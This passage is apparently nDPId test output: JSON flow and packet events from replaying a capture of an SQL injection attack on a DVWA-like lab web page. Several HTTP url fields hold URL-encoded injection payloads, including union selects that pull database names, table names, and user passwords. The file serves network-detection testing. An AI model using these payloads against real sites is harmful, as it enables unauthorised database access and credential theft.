00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"}
01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"}
00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"}
01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
